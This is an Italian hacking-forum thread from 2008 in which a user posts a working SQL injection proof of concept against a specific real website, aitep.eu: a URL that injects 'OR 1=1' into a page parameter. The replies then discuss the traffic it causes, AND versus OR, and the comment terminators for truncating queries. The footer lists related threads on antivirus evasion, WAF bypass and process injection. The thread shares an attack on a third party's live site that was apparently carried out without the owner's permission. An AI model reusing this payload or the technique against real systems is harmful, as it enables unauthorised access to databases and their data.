aitep.eu SQL Injection

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
B

BrainStorm

Utente Silver
29 Novembre 2008
46
1
1
62
PoC:

http://www.aitep.eu/it/page.php?act=menupage&menu=-99%20OR%201=1

Fate attenzione perchè la query genera un traffico moooolto elevato.
 
perchè tutte quelle che trovi generano sempre: il blocco del mio computer
lol
 
ma no, la mi ara una battuta perchè sul serio tute quelle che posti mi rallentano tutto il pc.
ma penso di aver trovato la risposta: è quel particolare comando che metti RALLENTA TUTTO
ti consiglio di mettere le possime volte 1=0-- oppure 1=1-- che funziona bene e non rallenta nulla.
 
Vedi che non cambia nulla con il -- finale perchè quello serve per commentare il resto della query. Quando dai il comando 1=1 viene restituito l' intero contenuto della tabella che in alcuni casi contiene molti dati. Capito ora? :p
 
non hai capito
non parlavod el -- che può essere benissimo anche /* o #
parlavo del fatto di scrivere AND e non OR
fidati è emglio ;-) almeno per me lo è ..e coincidenza vuole che solo le tue sono così e sono le uniche che mi danno problema al pc
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

N
Discussione AV bypass in mrt.exe con classic template injection (Bypass di tutti gli AV, 4/82 detection su VT)
  • Chiuso
  • 0
  • 205
0
205
Sicurezza Informatica
Netcat
0
Guida Videoguida 3 tecniche per bypassare il WAF di AWS
  • 3
  • 1K
3
1K
Pentesting e Ethical Hacking Guide e Tools
0xbro
N
Discussione OSINT 2024 - Sherlock (remake)
  • 6
  • 456
6
456
Advanced Hacking
MRPants
N
Discussione Process Hollowing + Process Injection con Python su Windows (davvero?)
  • 0
  • 305
0
305
Advanced Hacking
Netcat
Z
Gruppo di Guadagno GUADAGNO MATEMATICO! Crearsi una rendita mensile extra grazie al nostro servizio esclusivo!
  • Bumped
  • 29
  • 1K
29
1K
Guadagnare con Investimento
Zio Paperone
Top Bottom
Indietro